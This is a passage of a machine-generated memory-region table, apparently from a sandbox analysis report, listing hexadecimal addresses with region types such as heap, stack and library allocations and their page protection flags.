page read and write
|
||
|
205679AE000
|
heap
|
page read and write
|
||
|
14E37E3E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B330000
|
trusted library allocation
|
page read and write
|
||
|
188010BC000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
14E360E5000
|
trusted library allocation
|
page read and write
|
||
|
1A5EA350000
|
remote allocation
|
page read and write
|
||
|
1872621B000
|
heap
|
page read and write
|
||
|
7DA8EFE000
|
stack
|
page read and write
|
||
|
205679CC000
|
heap
|
page read and write
|
||
|
18726281000
|
heap
|
page read and write
|
||
|
2899DF000
|
stack
|
page read and write
|
||
|
1A5EA1BE000
|
trusted library allocation
|
page read and write
|
||
|
7DF4BCED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CAD6806000
|
heap
|
page read and write
|
||
|
2056BC41000
|
heap
|
page read and write
|
||
|
1CAD63B5000
|
heap
|
page read and write
|
||
|
18726288000
|
heap
|
page read and write
|
||
|
165C000
|
heap
|
page read and write
|
||
|
1B9A76D0000
|
heap
|
page execute and read and write
|
||
|
15C2000
|
heap
|
page read and write
|
||
|
1CAD6800000
|
heap
|
page read and write
|
||
|
1B9B7EF3000
|
trusted library allocation
|
page read and write
|
||
|
1CAD89C3000
|
heap
|
page read and write
|
||
|
1CAD63BE000
|
heap
|
page read and write
|
||
|
BD9000
|
stack
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
2CA537E000
|
stack
|
page read and write
|
||
|
20567B3D000
|
heap
|
page read and write
|
||
|
1CAD6810000
|
heap
|
page read and write
|
||
|
1CAD8C01000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
14E33CC2000
|
heap
|
page read and write
|
||
|
1B9B7E81000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8E70000
|
trusted library allocation
|
page read and write
|
||
|
17624AD0000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1CAD8A51000
|
heap
|
page read and write
|
||
|
1760C6BA000
|
trusted library allocation
|
page read and write
|
||
|
205679A5000
|
heap
|
page read and write
|
||
|
7FFD9B241000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
163A000
|
heap
|
page read and write
|
||
|
15C9000
|
heap
|
page read and write
|
||
|
1720BCE000
|
stack
|
page read and write
|
||
|
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
|
1CAD6490000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8A33000
|
heap
|
page read and write
|
||
|
1887C770000
|
heap
|
page read and write
|
||
|
1A5EA42D000
|
heap
|
page read and write
|
||
|
1CAD67CE000
|
heap
|
page read and write
|
||
|
15F7000
|
heap
|
page read and write
|
||
|
7FFD9B166000
|
trusted library allocation
|
page execute and read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
1CAD6833000
|
heap
|
page read and write
|
||
|
20567B77000
|
heap
|
page read and write
|
||
|
1CAD6487000
|
heap
|
page read and write
|
||
|
157B000
|
heap
|
page read and write
|
||
|
3A88000
|
direct allocation
|
page read and write
|
||
|
1C2D4287000
|
heap
|
page read and write
|
||
|
14E37E98000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8A35000
|
heap
|
page read and write
|
||
|
1A5E5CE0000
|
trusted library allocation
|
page read and write
|
||
|
1761C680000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B136000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B2A0000
|
trusted library allocation
|
page read and write
|
||
|
1760A77B000
|
heap
|
page read and write
|
||
|
1887E839000
|
heap
|
page read and write
|
||
|
18800226000
|
trusted library allocation
|
page read and write
|
||
|
15AD000
|
heap
|
page read and write
|
||
|
7FFD9B340000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C09000
|
trusted library allocation
|
page read and write
|
||
|
1887E800000
|
heap
|
page read and write
|
||
|
7FFD9B0B0000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C15000
|
trusted library allocation
|
page read and write
|
||
|
188012F6000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
2056C220000
|
trusted library allocation
|
page read and write
|
||
|
3F04000
|
direct allocation
|
page read and write
|
||
|
1CAD89FA000
|
heap
|
page read and write
|
||
|
2056C208000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8E7F000
|
trusted library allocation
|
page read and write
|
||
|
20D000
|
unkown
|
page readonly
|
||
|
14E4E042000
|
heap
|
page read and write
|
||
|
205679BA000
|
heap
|
page read and write
|
||
|
1CAD8A33000
|
heap
|
page read and write
|
||
|
170000
|
unkown
|
page readonly
|
||
|
1CAD89D3000
|
heap
|
page read and write
|
||
|
157B000
|
heap
|
page execute and read and write
|
||
|
231000
|
unkown
|
page readonly
|
||
|
2056BBF7000
|
heap
|
page read and write
|
||
|
246437B000
|
stack
|
page read and write
|
||
|
188010C4000
|
trusted library allocation
|
page read and write
|
||
|
2056C0C0000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
3D7F000
|
heap
|
page read and write
|
||
|
18726235000
|
heap
|
page read and write
|
||
|
246453E000
|
stack
|
page read and write
|
||
|
7FFD9B460000
|
trusted library allocation
|
page read and write
|
||
|
1A5E5BB0000
|
trusted library section
|
page readonly
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1C2D43E0000
|
heap
|
page read and write
|
||
|
7FFD9B280000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8E6A000
|
trusted library allocation
|
page read and write
|
||
|
2056BE19000
|
trusted library allocation
|
page read and write
|
||
|
20567AF3000
|
heap
|
page read and write
|
||
|
1872629B000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
|
1887C75A000
|
heap
|
page read and write
|
||
|
20567B76000
|
heap
|
page read and write
|
||
|
1A5EA400000
|
heap
|
page read and write
|
||
|
15F1000
|
heap
|
page read and write
|
||
|
1887C781000
|
heap
|
page read and write
|
||
|
1887C980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B0AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CAD67F7000
|
heap
|
page read and write
|
||
|
17220CC000
|
stack
|
page read and write
|
||
|
2CA411B000
|
stack
|
page read and write
|
||
|
1CAD649E000
|
heap
|
page read and write
|
||
|
1A5E4CAF000
|
heap
|
page read and write
|
||
|
11DD000
|
stack
|
page read and write
|
||
|
1CAD8C09000
|
trusted library allocation
|
page read and write
|
||
|
1760C1D0000
|
heap
|
page read and write
|
||
|
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B490000
|
trusted library allocation
|
page read and write
|
||
|
1760C7CC000
|
trusted library allocation
|
page read and write
|
||
|
1FD64FF6000
|
heap
|
page read and write
|
||
|
14E33D0A000
|
heap
|
page read and write
|
||
|
188010B7000
|
trusted library allocation
|
page read and write
|
||
|
188102FE000
|
trusted library allocation
|
page read and write
|
||
|
2056BBF2000
|
heap
|
page read and write
|
||
|
1CAD6557000
|
trusted library allocation
|
page read and write
|
||
|
2056BCE8000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
187262B2000
|
heap
|
page read and write
|
||
|
1B9A7FD6000
|
trusted library allocation
|
page read and write
|
||
|
1CAD649A000
|
heap
|
page read and write
|
||
|
2CA5FFE000
|
stack
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
20567B22000
|
heap
|
page read and write
|
||
|
14E33C00000
|
heap
|
page read and write
|
||
|
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
1760A6C8000
|
heap
|
page read and write
|
||
|
205679AA000
|
heap
|
page read and write
|
||
|
20567B8A000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
2CA5C7E000
|
unkown
|
page readonly
|
||
|
2056C160000
|
trusted library allocation
|
page read and write
|
||
|
18726214000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
2056BE19000
|
trusted library allocation
|
page read and write
|
||
|
231000
|
unkown
|
page readonly
|
||
|
3974000
|
heap
|
page read and write
|
||
|
14E33EB0000
|
heap
|
page readonly
|
||
|
1618000
|
heap
|
page read and write
|
||
|
7FFD9B2D0000
|
trusted library allocation
|
page read and write
|
||
|
11BF000
|
stack
|
page read and write
|
||
|
205679BE000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
|
1760CB90000
|
trusted library allocation
|
page read and write
|
||
|
1A5E4CAB000
|
heap
|
page read and write
|
||
|
1CAD67F7000
|
heap
|
page read and write
|
||
|
1CAD6489000
|
heap
|
page read and write
|
||
|
1CAD646A000
|
heap
|
page read and write
|
||
|
20567B26000
|
heap
|
page read and write
|
||
|
1CAD67CE000
|
heap
|
page read and write
|
||
|
44C0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B083000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CAD641A000
|
heap
|
page read and write
|
||
|
3D76000
|
heap
|
page read and write
|
||
|
1CAD67E5000
|
heap
|
page read and write
|
||
|
18801183000
|
trusted library allocation
|
page read and write
|
||
|
1A5E4D29000
|
heap
|
page read and write
|
||
|
1CAD65D3000
|
trusted library allocation
|
page read and write
|
||
|
14E33CE2000
|
heap
|
page read and write
|
||
|
20567B39000
|
heap
|
page read and write
|
||
|
17214FE000
|
stack
|
page read and write
|
||
|
7FFD9B992000
|
trusted library allocation
|
page read and write
|
||
|
4234000
|
direct allocation
|
page read and write
|
||
|
1887C799000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
20567989000
|
heap
|
page read and write
|
||
|
1CAD8CC0000
|
trusted library allocation
|
page read and write
|
||
|
14E38375000
|
trusted library allocation
|
page read and write
|
||
|
20567B88000
|
heap
|
page read and write
|
||
|
20567B20000
|
heap
|
page read and write
|
||
|
1CAD8A38000
|
heap
|
page read and write
|
||
|
1760C776000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B3A0000
|
trusted library allocation
|
page read and write
|
||
|
20566CD0000
|
trusted library allocation
|
page read and write
|
||
|
1FD6504E000
|
heap
|
page read and write
|
||
|
1720B83000
|
stack
|
page read and write
|
||
|
1CAD63B0000
|
heap
|
page read and write
|
||
|
1CAD8B35000
|
trusted library allocation
|
page read and write
|
||
|
18726230000
|
heap
|
page read and write
|
||
|
1A5E4C1E000
|
heap
|
page read and write
|
||
|
1872622B000
|
heap
|
page read and write
|
||
|
1CAD8932000
|
heap
|
page read and write
|
||
|
2CA667E000
|
stack
|
page read and write
|
||
|
1CAD88FC000
|
heap
|
page read and write
|
||
|
18726238000
|
heap
|
page read and write
|
||
|
1CAD6463000
|
heap
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
163D000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
7FFD9B2D0000
|
trusted library allocation
|
page read and write
|
||
|
2056BC38000
|
heap
|
page read and write
|
||
|
2056798D000
|
heap
|
page read and write
|
||
|
2CA56FE000
|
unkown
|
page readonly
|
||
|
3F80000
|
direct allocation
|
page read and write
|
||
|
1C2D421E000
|
heap
|
page read and write
|
||
|
20567B71000
|
heap
|
page read and write
|
||
|
159C000
|
heap
|
page read and write
|
||
|
7FFD9B420000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B2A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B15C000
|
trusted library allocation
|
page execute and read and write
|
||
|
15CC000
|
heap
|
page read and write
|
||
|
1B9A823A000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1CAD8C05000
|
trusted library allocation
|
page read and write
|
||
|
1FD65017000
|
heap
|
page read and write
|
||
|
171000
|
unkown
|
page execute read
|
||
|
2056BD2C000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
205679A5000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1CAD63A9000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
15FB000
|
heap
|
page read and write
|
||
|
7FFD9B449000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
1872626C000
|
heap
|
page read and write
|
||
|
15C4000
|
heap
|
page execute and read and write
|
||
|
2056BBFB000
|
heap
|
page read and write
|
||
|
11FF000
|
stack
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
7FFD9B370000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B458000
|
trusted library allocation
|
page read and write
|
||
|
205679F6000
|
heap
|
page read and write
|
||
|
1CAD682F000
|
heap
|
page read and write
|
||
|
1CAD8E64000
|
trusted library allocation
|
page read and write
|
||
|
14CA000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
7FFD9B460000
|
trusted library allocation
|
page read and write
|
||
|
1872B4E0000
|
heap
|
page read and write
|
||
|
7FFD9B4A0000
|
trusted library allocation
|
page read and write
|
||
|
9EE80FB000
|
stack
|
page read and write
|
||
|
1FD65050000
|
heap
|
page read and write
|
||
|
1CAD63AF000
|
heap
|
page read and write
|
||
|
18726217000
|
heap
|
page read and write
|
||
|
83480FB000
|
stack
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1887C940000
|
heap
|
page read and write
|
||
|
38D6000
|
heap
|
page read and write
|
||
|
14E35E54000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
20567B03000
|
heap
|
page read and write
|
||
|
15EB000
|
heap
|
page read and write
|
||
|
1CAD6498000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
7FFD9B3E0000
|
trusted library allocation
|
page read and write
|
||
|
1B9A5DE7000
|
heap
|
page read and write
|
||
|
205679CC000
|
heap
|
page read and write
|
||
|
1FD65040000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1880007D000
|
trusted library allocation
|
page read and write
|
||
|
1CAD67F7000
|
heap
|
page read and write
|
||
|
2CA66FE000
|
unkown
|
page readonly
|
||
|
1CAD8934000
|
heap
|
page read and write
|
||
|
1A5E4C5B000
|
heap
|
page read and write
|
||
|
187264F0000
|
heap
|
page read and write
|
||
|
7DA8CFE000
|
stack
|
page read and write
|
||
|
83482FD000
|
stack
|
page read and write
|
||
|
1CAD8A35000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
205679F6000
|
heap
|
page read and write
|
||
|
1760A8F0000
|
heap
|
page read and write
|
||
|
1CAD65D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B260000
|
trusted library allocation
|
page execute and read and write
|
||
|
2056BC7A000
|
heap
|
page read and write
|
||
|
18726281000
|
heap
|
page read and write
|
||
|
1A5EA1B0000
|
trusted library allocation
|
page read and write
|
||
|
20567B0F000
|
heap
|
page read and write
|
||
|
1CAD8E7D000
|
trusted library allocation
|
page read and write
|
||
|
20567B50000
|
heap
|
page read and write
|
||
|
18810013000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B0FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B9A7FA0000
|
trusted library allocation
|
page read and write
|
||
|
1887E920000
|
heap
|
page read and write
|
||
|
1C2D42F7000
|
heap
|
page read and write
|
||
|
1CAD6487000
|
heap
|
page read and write
|
||
|
2056BC31000
|
heap
|
page read and write
|
||
|
38DB000
|
heap
|
page read and write
|
||
|
18800DB5000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
3A40000
|
direct allocation
|
page read and write
|
||
|
1FD64FD5000
|
heap
|
page read and write
|
||
|
1C2D5D60000
|
heap
|
page read and write
|
||
|
2056BC5C000
|
heap
|
page read and write
|
||
|
2056BBF2000
|
heap
|
page read and write
|
||
|
1CAD6556000
|
trusted library allocation
|
page read and write
|
||
|
20567B24000
|
heap
|
page read and write
|
||
|
1887EBF2000
|
heap
|
page read and write
|
||
|
1CAD8A38000
|
heap
|
page read and write
|
||
|
1FD6500B000
|
heap
|
page read and write
|
||
|
1A5EA1E0000
|
trusted library allocation
|
page read and write
|
||
|
20567B33000
|
heap
|
page read and write
|
||
|
20567B28000
|
heap
|
page read and write
|
||
|
1A5EA26A000
|
trusted library allocation
|
page read and write
|
||
|
2056C120000
|
trusted library allocation
|
page read and write
|
||
|
205679B1000
|
heap
|
page read and write
|
||
|
3A49000
|
heap
|
page read and write
|
||
|
1502000
|
heap
|
page read and write
|
||
|
25E077E000
|
stack
|
page read and write
|
||
|
14E4E04A000
|
heap
|
page read and write
|
||
|
20567B28000
|
heap
|
page read and write
|
||
|
1CAD63C4000
|
heap
|
page read and write
|
||
|
1CAD67F7000
|
heap
|
page read and write
|
||
|
1CAD8E6F000
|
trusted library allocation
|
page read and write
|
||
|
1760C7C5000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1CAD88ED000
|
heap
|
page read and write
|
||
|
1CAD8907000
|
heap
|
page read and write
|
||
|
18810015000
|
trusted library allocation
|
page read and write
|
||
|
1FD65026000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
2056BD2C000
|
trusted library allocation
|
page read and write
|
||
|
2CA46F7000
|
stack
|
page read and write
|
||
|
187262B2000
|
heap
|
page read and write
|
||
|
15A7000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1CAD65E0000
|
trusted library allocation
|
page read and write
|
||
|
1A5EA4CE000
|
heap
|
page read and write
|
||
|
14E360D9000
|
trusted library allocation
|
page read and write
|
||
|
2CA5DF9000
|
stack
|
page read and write
|
||
|
17211F9000
|
stack
|
page read and write
|
||
|
1CAD6194000
|
trusted library allocation
|
page read and write
|
||
|
20567B7D000
|
heap
|
page read and write
|
||
|
20567998000
|
heap
|
page read and write
|
||
|
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
7FFD9B340000
|
trusted library allocation
|
page read and write
|
||
|
1B9B7E90000
|
trusted library allocation
|
page read and write
|
||
|
3DDD000
|
heap
|
page read and write
|
||
|
1A5E4C78000
|
heap
|
page read and write
|
||
|
7FFD9B0CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CAD8E65000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B220000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8E80000
|
trusted library allocation
|
page read and write
|
||
|
18800ABD000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
18726281000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1CAD8C80000
|
trusted library allocation
|
page read and write
|
||
|
18726217000
|
heap
|
page read and write
|
||
|
18726204000
|
heap
|
page read and write
|
||
|
1CAD649D000
|
heap
|
page read and write
|
||
|
7FFD9B272000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B150000
|
trusted library allocation
|
page read and write
|
||
|
1601000
|
heap
|
page read and write
|
||
|
2056C0E0000
|
trusted library allocation
|
page read and write
|
||
|
1A5E4CB9000
|
heap
|
page read and write
|
||
|
1CAD88F7000
|
heap
|
page read and write
|
||
|
20567B24000
|
heap
|
page read and write
|
||
|
165C000
|
heap
|
page read and write
|
||
|
1760C580000
|
heap
|
page readonly
|
||
|
391F000
|
heap
|
page read and write
|
||
|
7FFD9B3B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B231000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
166E000
|
heap
|
page read and write
|
||
|
2056BBFB000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
1CAD89C0000
|
heap
|
page read and write
|
||
|
1760A7B8000
|
heap
|
page read and write
|
||
|
14E374E9000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
|
1613000
|
heap
|
page read and write
|
||
|
1CAD6800000
|
heap
|
page read and write
|
||
|
1872629D000
|
heap
|
page read and write
|
||
|
23D000
|
unkown
|
page read and write
|
||
|
14E36AE9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B310000
|
trusted library allocation
|
page read and write
|
||
|
3CED000
|
heap
|
page read and write
|
||
|
1887C7D1000
|
heap
|
page read and write
|
||
|
2056BB5E000
|
heap
|
page read and write
|
||
|
1CAD899F000
|
heap
|
page read and write
|
||
|
20567B77000
|
heap
|
page read and write
|
||
|
1887C990000
|
heap
|
page readonly
|
||
|
7FFD9B380000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B084000
|
trusted library allocation
|
page read and write
|
||
|
2056BE19000
|
trusted library allocation
|
page read and write
|
||
|
1A5EA1B8000
|
trusted library allocation
|
page read and write
|
||
|
3A51000
|
heap
|
page read and write
|
||
|
1760C100000
|
heap
|
page read and write
|
||
|
1762485B000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
1B9A5DED000
|
heap
|
page read and write
|
||
|
14E4E091000
|
heap
|
page read and write
|
||
|
205679BE000
|
heap
|
page read and write
|
||
|
1B9A8350000
|
trusted library allocation
|
page read and write
|
||
|
20567B39000
|
heap
|
page read and write
|
||
|
1A5E4BF0000
|
heap
|
page read and write
|
||
|
20566D98000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B3D0000
|
trusted library allocation
|
page read and write
|
||
|
9EE7EFE000
|
stack
|
page read and write
|
||
|
2056AD60000
|
trusted library allocation
|
page read and write
|
||
|
14E4DD3C000
|
heap
|
page read and write
|
||
|
2CA52FE000
|
unkown
|
page readonly
|
||
|
1A5E5500000
|
heap
|
page read and write
|
||
|
2056BC38000
|
heap
|
page read and write
|
||
|
1A5EA280000
|
trusted library allocation
|
page read and write
|
||
|
1A5EA214000
|
trusted library allocation
|
page read and write
|
||
|
20567AFA000
|
heap
|
page read and write
|
||
|
1CAD8A35000
|
heap
|
page read and write
|
||
|
20567946000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1CAD6483000
|
heap
|
page read and write
|
||
|
1553000
|
heap
|
page execute and read and write
|
||
|
14E356F0000
|
heap
|
page read and write
|
||
|
7FFD9B423000
|
trusted library allocation
|
page read and write
|
||
|
1760C69B000
|
trusted library allocation
|
page read and write
|
||
|
1C2D4229000
|
heap
|
page read and write
|
||
|
1CAD6487000
|
heap
|
page read and write
|
||
|
1CAD6521000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1C2D42DB000
|
heap
|
page read and write
|
||
|
170000
|
unkown
|
page readonly
|
||
|
28999E000
|
stack
|
page read and write
|
||
|
2056BB54000
|
heap
|
page read and write
|
||
|
20567991000
|
heap
|
page read and write
|
||
|
2056BB64000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
7FFD9B3D0000
|
trusted library allocation
|
page read and write
|
||
|
20566BD6000
|
heap
|
page read and write
|
||
|
7FFD9B4F0000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
14E4DD53000
|
heap
|
page read and write
|
||
|
14E45C31000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1A5EA23E000
|
trusted library allocation
|
page read and write
|
||
|
14E45C5F000
|
trusted library allocation
|
page read and write
|
||
|
1A5EA310000
|
trusted library allocation
|
page read and write
|
||
|
25E087E000
|
stack
|
page read and write
|
||
|
1C2D41C0000
|
heap
|
page read and write
|
||
|
1CAD8C11000
|
trusted library allocation
|
page read and write
|
||
|
2056BBF2000
|
heap
|
page read and write
|
||
|
1887ECBA000
|
heap
|
page read and write
|
||
|
2056BB5D000
|
heap
|
page read and write
|
||
|
2056BE13000
|
trusted library allocation
|
page read and write
|
||
|
187262B2000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
14E4DFB2000
|
heap
|
page read and write
|
||
|
2056BAB0000
|
heap
|
page read and write
|
||
|
24646B8000
|
stack
|
page read and write
|
||
|
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
2056BC36000
|
heap
|
page read and write
|
||
|
1CAD67B0000
|
heap
|
page read and write
|
||
|
2CA50FB000
|
stack
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
2056BC3C000
|
heap
|
page read and write
|
||
|
1721FCE000
|
stack
|
page read and write
|
||
|
7FFD9B370000
|
trusted library allocation
|
page read and write
|
||
|
1A5E4C43000
|
heap
|
page read and write
|
||
|
1C2D42A2000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
7FFD9B2E0000
|
trusted library allocation
|
page read and write
|
||
|
2056BBF7000
|
heap
|
page read and write
|
||
|
2056BC36000
|
heap
|
page read and write
|
||
|
205679C8000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
2CA4CFC000
|
stack
|
page read and write
|
||
|
1CAD643F000
|
heap
|
page read and write
|
||
|
2CA527E000
|
stack
|
page read and write
|
||
|
24641FE000
|
stack
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
205679B8000
|
heap
|
page read and write
|
||
|
14E4DDF0000
|
heap
|
page read and write
|
||
|
1FD65050000
|
heap
|
page read and write
|
||
|
2084000
|
heap
|
page read and write
|
||
|
1CAD6432000
|
heap
|
page read and write
|
||
|
1CAD8E61000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1760A6C0000
|
heap
|
page read and write
|
||
|
1CAD67E5000
|
heap
|
page read and write
|
||
|
1CAD8A33000
|
heap
|
page read and write
|
||
|
1CAD6832000
|
heap
|
page read and write
|
||
|
205679CC000
|
heap
|
page read and write
|
||
|
1A5E4C9B000
|
heap
|
page read and write
|
||
|
1CAD641A000
|
heap
|
page read and write
|
||
|
1887E893000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
20567B22000
|
heap
|
page read and write
|
||
|
7FFD9B270000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CAD63B1000
|
heap
|
page read and write
|
||
|
20567940000
|
heap
|
page read and write
|
||
|
2056BC38000
|
heap
|
page read and write
|
||
|
15F1000
|
heap
|
page read and write
|
||
|
1B9BFEA0000
|
heap
|
page read and write
|
||
|
1CAD8D80000
|
trusted library allocation
|
page read and write
|
||
|
20566D05000
|
trusted library allocation
|
page read and write
|
||
|
1618000
|
heap
|
page read and write
|
||
|
7FFD9B260000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B09B000
|
trusted library allocation
|
page read and write
|
||
|
1C2D42DB000
|
heap
|
page read and write
|
||
|
1CAD6483000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1CAD6809000
|
heap
|
page read and write
|
||
|
7FFD9B440000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
1CAD6194000
|
trusted library allocation
|
page read and write
|
||
|
1CAD89C3000
|
heap
|
page read and write
|
||
|
1C2D5BBC000
|
heap
|
page read and write
|
||
|
7FFD9B9AC000
|
trusted library allocation
|
page read and write
|
||
|
1A5EA2AC000
|
trusted library allocation
|
page read and write
|
||
|
1887C6D0000
|
heap
|
page read and write
|
||
|
1CAD63A0000
|
heap
|
page read and write
|
||
|
20567B50000
|
heap
|
page read and write
|
||
|
1760A716000
|
heap
|
page read and write
|
||
|
17624800000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
7FFD9B480000
|
trusted library allocation
|
page read and write
|
||
|
1C2D4210000
|
heap
|
page read and write
|
||
|
2056BC31000
|
heap
|
page read and write
|
||
|
205679AA000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
2CA49FE000
|
unkown
|
page readonly
|
||
|
2056BC36000
|
heap
|
page read and write
|
||
|
7FFD9B450000
|
trusted library allocation
|
page read and write
|
||
|
17624ADF000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8E7E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B410000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8E77000
|
trusted library allocation
|
page read and write
|
||
|
15F7000
|
heap
|
page read and write
|
||
|
1B9A5DA1000
|
heap
|
page read and write
|
||
|
15F0000
|
heap
|
page read and write
|
||
|
1B9A5DAD000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1CAD8907000
|
heap
|
page read and write
|
||
|
